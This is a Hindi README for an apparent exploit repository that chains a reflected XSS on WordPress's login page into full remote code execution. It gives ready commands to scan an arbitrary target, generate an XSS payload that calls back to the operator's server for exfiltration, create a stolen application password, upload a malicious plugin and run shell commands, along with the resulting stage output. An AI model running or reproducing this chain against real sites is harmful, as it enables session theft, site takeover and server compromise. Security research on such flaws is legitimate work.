
CVE-2026-64638: WordPress प्री-ऑथ XSS → RCE (XSS2Shell) PoC
प्री-ऑथेंटिकेशन रिफ्लेक्टेड XSS → वर्डप्रेस कोर में रिमोट कोड एक्ज़ीक्यूशन
⚠️ अस्वीकरण: यह रिपॉजिटरी केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है। अनधिकृत पहुंच अवैध है। देखें SECURITY.md।
CVE-2026-64638 वर्डप्रेस कोर के login/wplogin प्रोसेसिंग पाइपलाइन में प्री-ऑथेंटिकेशन रिफ्लेक्टेड XSS है। यह दोष एक पार्सर अंतर (parser differential) के कारण उत्पन्न होता है, जहां दूषित इनपुट PHP के strip_tags() से बच जाता है लेकिन बाद में wp_kses_post() द्वारा HTML के रूप में पुनर्निर्मित किया जाता है, जिससे हमलावर-नियंत्रित मार्कअप DOM तक पहुंच जाता है।
pwn.ai के शोधकर्ताओं ने XSS2Shell का प्रदर्शन किया — एक श्रृंखला जो इस XSS को डिफ़ॉल्ट वर्डप्रेस इंस्टॉलेशन पर पूर्ण PHP कोड एक्ज़ीक्यूशन तक बढ़ा देती है, जब कोई प्रमाणित व्यवस्थापक हमलावर-नियंत्रित सामग्री के साथ इंटरैक्ट करता है।
| गुण | मान |
|---|---|
| CVE | CVE-2026-64638 |
| CVSS | 8.9 |
| प्रकार | रिफ्लेक्टेड XSS → RCE श्रृंखला |
| घटक | वर्डप्रेस कोर लॉगिन पेज |
| प्रभावित | वर्डप्रेस < 7.0.3 (4.7 से बैकपोर्ट्स) |
| पैच किया गया | वर्डप्रेस 7.0.3 (6 अगस्त, 2026) |
| मूल कारण | पार्सर अंतर: strip_tags() बनाम wp_kses_post() |
git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC
# One command — spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain
क्या होता है:
[STAGE 1] WordPress 7.0.2 → VULNERABLE
[STAGE 2] XSS payload URL generated
[STAGE 3] Application Password created
[STAGE 4] Plugin uploaded + activated
[STAGE 5] RCE → uid=33(www-data)
./test.sh up # Start Docker + install WordPress (admin/admin123)
./test.sh scan # Detect version & patch status
./test.sh chain # Run full XSS2Shell RCE chain
./test.sh all # up + scan + chain (all-in-one)
./test.sh down # Stop containers
./test.sh clean # Stop + remove all volumes
# Or with Make
make up # Start Docker
make install # Install WordPress
make scan # Check vulnerability
make gen-xss # Generate XSS payload URL
make test-chain # Full RCE chain
make serve # Start callback server on :8080
make down # Stop containers
CVE-2026-64638-POC/
├── README.md
├── SECURITY.md # Security policy & disclaimer
├── docker-compose.yml # WordPress 7.0.2 + MySQL 8 + WP-CLI
├── Makefile # Shortcut commands
├── test.sh # Automated test suite
├── requirements.txt # Python dependencies
│
├── xss2shell_chain.py # [MAIN] Full chain: scan → XSS → app-password → plugin → RCE
├── xss2shell_scanner.py # Version detection + username reflection test
├── xss2shell_checker.py # Lightweight patch checker (safe, non-exploitative)
├── exploit_server.py # Callback server for XSS exfiltration
├── xss_payload.html # Interactive XSS PoC (browser)
│
└── docs/
├── CHAIN.md # Technical breakdown of all 7 chain stages
├── MITIGATION.md # Defensive guidance + detection rules
└── PAYLOAD_NOTES.md # Notes on the CVE-specific bypass payload
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
# Scan target
python3 xss2shell_chain.py scan -u https://target.example.com
# Generate XSS payload
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080
# Full chain (requires WordPress admin credentials)
python3 xss2shell_chain.py chain \
-u https://target.example.com \
--user admin --pass "password" \
--cmd "id"
# Individual stages
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"
पूर्ण विवरण के लिए देखें docs/CHAIN.md।
┌─────────────────────────────────────────────────────────────────┐
│ 1. Reflected XSS on wp-login.php (failed-login error page) │
│ 2. DOM clobbering to manipulate page context │
│ 3. JSONP / Same-Origin Method Execution (SOME) │
│ 4. Application Password creation via REST API │
│ 5. REST API access with stolen Application Password │
│ 6. Malicious plugin/theme upload │
│ 7. PHP code execution → full RCE │
└─────────────────────────────────────────────────────────────────┘
नोट: चरण 3-7 के लिए XSS पेलोड के साथ इंटरैक्ट करने वाले लॉग-इन व्यवस्थापक की आवश्यकता होती है। भेद्यता प्री-ऑथ है, लेकिन पूर्ण RCE श्रृंखला को पूरा करने के लिए व्यवस्थापक-स्तरीय पहुंच आवश्यक है।
विस्तृत हार्डनिंग और डिटेक्शन नियमों के लिए देखें docs/MITIGATION.md।
सुरक्षा अनुसंधान और PoC। केवल शैक्षिक उपयोग के लिए।
MIT — देखें LICENSE